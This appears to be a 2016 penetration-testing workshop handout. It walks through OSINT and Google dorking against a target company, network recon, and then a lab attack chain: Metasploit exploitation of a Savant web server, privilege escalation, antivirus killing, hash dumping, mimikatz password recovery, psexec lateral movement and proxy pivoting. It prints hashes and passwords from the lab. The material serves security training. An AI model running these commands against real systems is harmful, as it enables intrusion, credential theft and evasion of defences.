################################

# Pentester Night School 2016  # 

# By Joe McCray                #

################################

##########

# VMWare #

##########

- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.

- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.

##########################

# Download the attack VM #

##########################

VM for these labs

-----------------

https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip

user: strategicsec

pass: strategicsec

---------------------------------------------------------------------------------------------------------------------------------

################################

# Tactical Pentest Methodology #

################################

The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan.

-=-=-=-=-=- Phase 1 -=-=-=-=-=-

##########################################

# Step 1: External Target Identification #

##########################################

Find all of the IP ranges owned by your target company via the following websites:

- https://www.robtex.com/

- http://toolbar.netcraft.com/site_report

Look for weak SSL implementations

- https://www.ssllabs.com/ssltest/

#############################

# Step 2: Google Quick Hits #

#############################

Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work.

https://www.exploit-db.com/google-hacking-database/

Really good google dorks to use:

site:yourtarget.com filetype:pcf

site:yourtarget.com filetype:ica

1. Footholds:

-------------

https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text=

Be sure to use 'site:yourtarget.com' [ google dork for the site above ]

2. Passwords:

-------------

https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text=

Be sure to use 'site:yourtarget.com' [ google dork for the site above ]

3. Sensitive Directories:

-------------------------

https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=

Be sure to use 'site:yourtarget.com' [ google dork for the site above ]

Make sure that you do at least 50-100 different Google dorks. Do no less than 10 dorks per category.

###########################

# Step 3: Compromise Data #

###########################

Look to see if they have already been breached

Search for the target company (and their major competitors) in the Data Breach Database 

http://www.privacyrights.org/data-breach

Place targetgcompany.com in the search box of the link below to look known breaches

http://zone-h.com/search

Replace targetgcompany.com with your target domain name to look for known XSS vulnerabilities in the site.

http://xssed.com/search?key=targetcompany.com      

##############################

# Step 4: Build OSINT Report #

##############################

Passive Recon

-------------

Install this add-on and enumerate as much info as possible

- https://addons.mozilla.org/en-US/firefox/addon/passiverecon/

Next we build at an OSINT report with the data gleaned from the previous steps:

https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc

We looked through this to get an idea of what is not only involved in doing passive recon, but what the actual output of the work should look like.

---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 2 -=-=-=-=-=-

##########################

# Download the attack VM #

##########################

VM for these labs

-----------------

https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip

user: strategicsec

pass: strategicsec

############################################

# Identifying External Security Mechanisms #

############################################

sudo /sbin/iptables -F

     strategicsec

cd /home/strategicsec/toolz

###########################

# Target IP Determination #

###########################

cd /home/strategicsec/toolz

perl blindcrawl.pl -d targetgcompany.com

-- Take each IP address and look ip up here:

http://www.networksolutions.com/whois/index.jsp

cd ~/toolz/fierce2

fierce -dns targetgcompany.com

cd ..

cd ~/toolz/

./ipcrawl 148.87.1.1 148.87.1.254                               (DNS forward lookup against an IP range)

sudo nmap -sL 148.87.1.0-255

     strategicsec

sudo nmap -sL 148.87.1.0-255 | grep oracle

     strategicsec

sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255

     strategicsec

Reference:

http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html

###########################

# Load Balancer Detection #

###########################

 Here are some command-line options to use for identifying load balancers:

dig google.com

cd ~/toolz

./lbd-0.1.sh targetgcompany.com

halberd targetgcompany.com

######################################

# Web Application Firewall Detection #

######################################

cd ~/toolz/wafw00f

python wafw00f.py http://www.targetgcompany.com

cd ~/toolz/

sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com

     strategicsec

sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com

     strategicsec

---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 3 -=-=-=-=-=-

Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.

So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:

https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf 

sudo nmap -sP 10.0.0.0/24

sudo nmap -sL 10.0.0.0/24

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

./ipcrawl 10.0.0.1 10.0.0.254

wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c propecia

sudo cp propecia /bin

propecia 10.0.0 22

propecia 10.0.0 3389

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

cd ~/toolz

wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2

tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2

sudo cp wkhtmltoimage-i386 /usr/local/bin/

git clone git://github.com/SpiderLabs/Nmap-Tools.git

cd Nmap-Tools/NSE/

sudo cp http-screenshot.nse /usr/share/nmap/scripts/

sudo nmap --script-updatedb

cd ~/toolz/

mkdir labscreenshots

cd labscreenshots/

sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/strategicsec/labnet-ip-list.txt

vi screenshots.sh

#!/bin/bash

printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html

ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html

printf "</BODY></HTML>" >> labnet-port-80-screenshots.html

sh screenshots.sh

##########################

# Nmap NSE tricks to try #

##########################

sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24

sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24

####################################

# Finally, let's exploit something #

####################################

nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15

	https://www.exploit-db.com/search

	Search for:

	Savant httpd 3.1

	Apache httpd 2.0.58 ((Win32))

	Found one written in Python:

	https://www.exploit-db.com/exploits/18401/

	Found one for Savant 3.1 from Metasploit:

	https://www.exploit-db.com/exploits/16770/

cd ~/toolz/metasploit

./msfconsole

use exploit/windows/http/savant_31_overflow

set RHOST 10.0.0.15

set PAYLOAD windows/meterpreter/bind_nonx_tcp

set RPORT 80

set LPORT 7777

exploit

********************************** Figure out who and where you are **********************************

meterpreter> sysinfo

meterpreter> getuid

meterpreter> ipconfig

meterpreter> run post/windows/gather/checkvm

meterpreter> run get_local_subnets

********************************** Escalate privileges and get hashes **********************************

meterpreter> use priv

meterpreter > getsystem

...got system (via technique 1).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

--------------------------------------------------------

meterpreter> run killav

meterpreter> run post/windows/gather/hashdump

	Got the following admin hash:

	Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::

meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter > load mimikatz

meterpreter > kerberos

	This should give me the administrative password:

	)K5?Jocb(Yx 

********************************** Enumerate the host you are on **********************************

meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(savant_31_overflow) > back

msf>

********************************** Lateral Movement *******************************

Now we can run the PSEXEC exploit.

-- Option 1:

use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass )K5?Jocb(Yx

set RHOST 10.0.0.15

set payload windows/meterpreter/bind_tcp

set LPORT 2345

exploit

********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(psexec) >back

msf>

**********************************  

-- Option 2:

use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363

set payload windows/meterpreter/bind_tcp

set RHOST 10.0.0.15                      

set LPORT 5678

exploit

********************************** Set up your Pivot **********************************

meterpreter > background

                                                        <-- background the session

        You want to get back to this prompt:

        msf exploit(handler) > back                     <--- you need to get to main msf> prompt

        sessions -l                                     <--find a session you want to pivot through (note the IP and session number)

        Now set up Pivot with a route add

        ---------------------------------

route print												<--- should be blank

route add 10.0.0.15 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)

route print                                             <----- verify new route

******************************Scan through your Pivot ******************************

use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot

set THREADS 10

set RHOSTS 10.0.0.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack

set PORTS 445

run

####################################

# Socks Tunneling with Proxychains #

####################################

--- Open a duplicate putty session to your Ubuntu host

sudo apt-get install -y proxychains

    strategicsec

sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080

        Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.

        socks4  127.0.0.1 1080

***************************Set up a Socks Proxy through your Pivot *************************

use auxiliary/server/socks4a

set SRVHOST 127.0.0.1

set SRVPORT 1080

run

        --- Go back to your other putty session with the meterpreter shell

cd ~

proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24           <--- This is going to be really slow

        ---close the duplicate putty session to your Ubuntu host